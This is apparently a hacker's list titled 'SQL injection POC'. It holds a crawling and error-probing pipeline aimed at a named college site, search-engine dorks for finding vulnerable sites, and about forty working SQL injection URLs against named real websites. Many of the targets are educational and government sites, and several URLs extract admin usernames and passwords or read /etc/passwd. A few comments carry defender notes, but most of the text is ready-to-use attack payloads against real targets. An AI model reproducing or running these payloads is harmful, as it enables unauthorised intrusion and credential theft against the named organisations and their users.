SQL injection POC

# Error-string probe over one host's parameterised URLs. Stage by stage:
#   katana        - takes the host from stdin; -d 5 sets crawl depth, -ef drops
#                   png/css/js, -ps/-pss select the passive sources listed
#                   (waybackarchive, commoncrawl, alienvault), -f qurl prints
#                   only URLs that carry a query string.
#   grep "\?"     - keeps lines containing a literal "?".
#   sed           - rewrites from the FIRST "=" to end of line, so every URL is
#                   reduced to a single parameter; the value becomes A followed
#                   by a single quote (presumably: relies on sed treating \' in
#                   the replacement as a plain quote - confirm on the sed in use).
#   uniq          - removes adjacent duplicates only (the list is not sorted);
#                   the result is written to params.txt.
#   httpx-toolkit - requests each URL from params.txt; -mr reports responses
#                   matching the regex.
# The regex mixes DBMS/driver fragments (SQL, syntax, ORA-00933, PSQLException)
# with generic words (Server, Error, Application, Microsoft), so a match means
# "error-looking response", not a confirmed injection.
# Defender's reading: in access logs this shows up as a burst of GETs from one
# client whose query strings all end in =A' . The matcher depends on database
# error text reaching the client, so parameterised queries plus generic error
# pages leave it nothing to report.
echo http://www.kaliachakcollege.edu.in | katana -d 5 -ef png,css,js -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | grep "\?" | sed "s/=.*/=A\'/" | uniq > params.txt; cat params.txt | httpx-toolkit -mr ".*SQL.*|.*syntax.*|.*error.*|.*Server.*|.*Application.*|.*Error.*|.*'/'.*|.*ORA-00933.*|.*Microsoft.*|.*PSQLException.*"

Dorks for finding MySQL-vulnerable websites:

site:*.*.com inurl:group_concat(username, filetype:php
inurl:"php?id=" site:example.com
site:*.*.pk inurl:?id= filetype:php

Dorks for finding MSSQL-vulnerable websites:

site:www.*.edu.pk inurl:?id= ext:asp | ext:aspx
site:www.*.edu.in inurl:?id= filetype:php
site:*.*.in inurl:Product.aspx?Id=

-----------------------------------------------------------

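Site-2: Load File /etc/passwd (MySQL's load_file() returns data only when the connecting account holds the FILE privilege and secure_file_priv permits the path, so a result here indicates an over-privileged application database account)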

http://www.way-to-win.com/newindex/info/index_hotnews_mini.php?ln=4&aid=0' union select 1,2,3,4,5,6,7,8,9,10,11,12,load_file('/etc/passwd'),14,15--+

-----------------------------------------------------------

Site-3: www.viangbua.com

https://www.viangbua.com/booking.php?id=-21' union select 1,2,unhex(hex(group_concat(username,0x3a,password))),4,5,6,7,8,9,10,11,12 from admin_user--+

-----------------------------------------------------------

Site-4: www.iftinuk.com

http://www.iftinuk.com/display_agents.php?id=-384+union+select+1,2,3,4,group_concat(username,0x3a,password),6,7,8+from+users

-----------------------------------------------------------

Site-5: www.pudak-scientific.com

https://www.pudak-scientific.com/detail_products.php?id=-132+union+select+1,2,3,/*!50000(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+tSYSUSER)*/,5--+-

-----------------------------------------------------------

Site-6: www.neutralposture.com

https://www.neutralposture.com/_site/about.php?id=-1 union select 1,2,group_concat(username,0x3a,password),4,5,6+from+member

-----------------------------------------------------------

Site-7: www.cordoganclark.com

https://www.cordoganclark.com/newsitem.php?id=-34+union+select+1,2,3,group_concat(username,0x3a,password),5,6+from+auth_user_md5

-----------------------------------------------------------

Site-8: www.braywanderers.com

http://www.braywanderers.com/showarticle.php?id=-227 union all select group_concat(id,0x3a,username,0x3a,password,0x3a,email),2 from people--

-----------------------------------------------------------

Site-9: www.cccaust.com

https://www.cccaust.com/church.php?id=3005+union+select+group_concat(username,0x3a,password),2,3,4,5,6,7,8,7,10,11,12,13+from+users+limit+0,1--+-

-----------------------------------------------------------

Site-10 MYSQL:Blind injection: www.intothewildelephantcamp.com

https://www.intothewildelephantcamp.com/gallery-detail.php?id=26%27+and+(select+1+from+dual+where+database()+like+%27_____________%27)--+

-----------------------------------------------------------

Site-10 MYSQL: Error_based-XPATH-EXTRACTVALUE: polymerindustries.in

https://polymerindustries.in/Product.aspx?id=2'+and+extractvalue(0x0a,concat(0x0a,(select+database())))--+&name=ISOPHTHALATES

-----------------------------------------------------------

Site-11 kphcip.gkp.pk

https://kphcip.gkp.pk/image.php?id=-12'union+select+1,2,3,user(),5--+

-----------------------------------------------------------

Site-12 fics.nust.edu.pk

https://fics.nust.edu.pk/event/igs.php?id=-1+Union+Select+1,user(),3,4,5,6

-----------------------------------------------------------

Site-13 sindhculture.gov.pk

https://sindhculture.gov.pk/book.php?id=-1'union+all+select+1,user(),version(),4,5,6,7,8,9--+-

-----------------------------------------------------------

Site-14 ilm.edu.pk

https://ilm.edu.pk/programs.php?id=-8'+/*!50000UniON%20SeLeCt*/+1,2,3,user(),5,6,7,8,9,10,11,12--+

-----------------------------------------------------------

Site-15 www.baqai.edu.pk

https://www.baqai.edu.pk/student-forms.php?id=-28'+union+select+1,user(),3,4,5,6--+

----------------------------------------------------------

Site-16 longlife.com.pk


https://longlife.com.pk/categories.php?id=-2+/*!50000UniON%20SeLeCt*/+1,user(),3,4,5,6

----------------------------------------------------------

Site-17 www.thevision.edu.pk

http://www.thevision.edu.pk/news_details.php?id=-9'/**/union/**/select/**/1,version(),3,4,5,6,7,8--+

----------------------------------------------------------

Site-18 www.alresfordmensshed.org.uk

https://www.alresfordmensshed.org.uk/item.php?i=-125+UNION+ALL+SELECT+1,2,3,4,uuid(),6,7,8,9,10,11,12,13,14,15

----------------------------------------------------------

Site-19 MultiQuery Injection: www.plantandem.be

http://www.plantandem.be/home.php?p=g&id=4--+'and%20false/*!50000union*/select%201,2,3,user(),5,6,7,8,9,10,11--+'

----------------------------------------------------------

Site-20 MultiQuery Injection: www.hnhtech.com

http://www.hnhtech.com/apply_online.php?value=Careers--+%27and+false/*!50000union*/select+1,2,user(),4,5,6--+%27&&id=1

----------------------------------------------------------

Site-21 www.yamaha-friends.com

https://www.yamaha-friends.com/gallery-detail.php?id=-9+Union+select+1,2,user(),4,5,6,7

----------------------------------------------------------

Site-22 MSSQL: www.kpbte.edu.pk

https://www.kpbte.edu.pk/pages/contactdetails.aspx?id=1'+and+1=0+union+select+@@version,2,3,4--
https://www.kpbte.edu.pk/pages/contactdetails.aspx?id=1%27+and+1=0+union+select+(select+table_name%2b'::'%2bcolumn_name as t+from+information_schema.columns FOR XML PATH('')),2,3,4--
https://www.kpbte.edu.pk/pages/contactdetails.aspx?id=1%27+and+1=0+union+select+output,2,3,4%20from%20temp_dios_sample--

----------------------------------------------------------

Site-23 MSSQL: Error-Based: www.alazharswat.edu.pk

https://www.alazharswat.edu.pk/relatedaddformgallery.aspx?id=2'+and+1=@@version--
https://www.alazharswat.edu.pk/relatedaddformgallery.aspx?id=2'+and 1=(select+table_name as t+from+information_schema.tables FOR XML PATH(''))--

----------------------------------------------------------

Site-24 www.greenclub.gr

https://www.greenclub.gr/main.php?id=-84+union+select+1,2,3,4,5&lang=el

----------------------------------------------------------

Site-25 revistaramuri.ro

http://revistaramuri.ro/index.php?id=-460+union+select+1,2,3,4,5,6,7--

----------------------------------------------------------

Site-26 www.koracing.net/

https://www.koracing.net/viewproduct.php?folder=5&product=-453+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13

----------------------------------------------------------

Site-27 www.casella.com.tr

https://www.casella.com.tr/tr/sayfa.php?id=800004321+Union+Select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+

----------------------------------------------------------

Site-28 www.tgophoto.com

https://www.tgophoto.com/m/about.php?id=483'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--+

----------------------------------------------------------

Site-29 www.corfis.com

https://www.corfis.com/Sayfa.php?Git=Anasayfa&Sayfa=Read&id=-38'/**/Union/**/All+Select/**/1,2,3,version(),5,6,7,8,9,10,11,12,13--+

----------------------------------------------------------

Site-30 www.swarrnim.edu.in

https://www.swarrnim.edu.in/swarrnim/photogallery-details.php?id=-1'+/*!50000union*/select+1,2,3,user(),5,6,7,8,9,10,11--+

----------------------------------------------------------

Site-31 www.kaliachakcollege.edu.in

http://www.kaliachakcollege.edu.in/view_notice.php?id=-643%27+union+select+1,2,user(),4,5,6--+
https://kaliachakcollege.edu.in/naac_sss/administrator/final_report.php?session=1%27+OR+1=1--+-
https://www.sriramachandra.edu.in/university/rank-list.php?id=390+and+true

----------------------------------------------------------

Site-32 qau.edu.pk

https://qau.edu.pk/lateralentry/viewrecord.php?id=UFM24-06388&list=-1+Union+all+select+1,2,database(),version(),5,@@datadir,user(),8--+

----------------------------------------------------------

Site-34 www.cr-led.com

http://www.cr-led.com/news.php?id=-4 union select 1,2,group_concat(username,password),4,5,6,7,8,9,10,11,12,13 from admin--

----------------------------------------------------------

Site-35 www.webucate.in

https://www.webucate.in/page-category_freeTestSeries.php?catId=42&subCatId=63+and+0+Union+All+Select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+

----------------------------------------------------------

Site-36 www.isu.edu.pk

https://www.isu.edu.pk/facultyMember.php?Id=-71+Union+All+Select+1,version(),3,4,5,6,7--+

----------------------------------------------------------

Site-37 www.slmc.edu.pk

https://www.slmc.edu.pk/hospital.php?id=3'+/**/union/**/select/**/+1,version()--+-

----------------------------------------------------------

Site-38 sw.muet.edu.pk

https://sw.muet.edu.pk/facultydetail.php?id=14

----------------------------------------------------------

Site-39 ccl.edu.pk

https://ccl.edu.pk/profile.php?id=-6'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--+

----------------------------------------------------------

Site-40 margalla.edu.pk

https://margalla.edu.pk/dpt-form/print-profile.php?id=-721'+Union+Select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+

----------------------------------------------------------

Site-41 exams.uom.edu.pk

https://exams.uom.edu.pk/results/2022/Bsfall/dmc.php?rollno=35086+OR+1

----------------------------------------------------------

Site-41 www.yamaha-friends.com

https://www.yamaha-friends.com/news-detail.php?id=1%27

----------------------------------------------------------

Site-41 www.embryohotel.com

https://www.embryohotel.com/room-detail.php?id=%27"
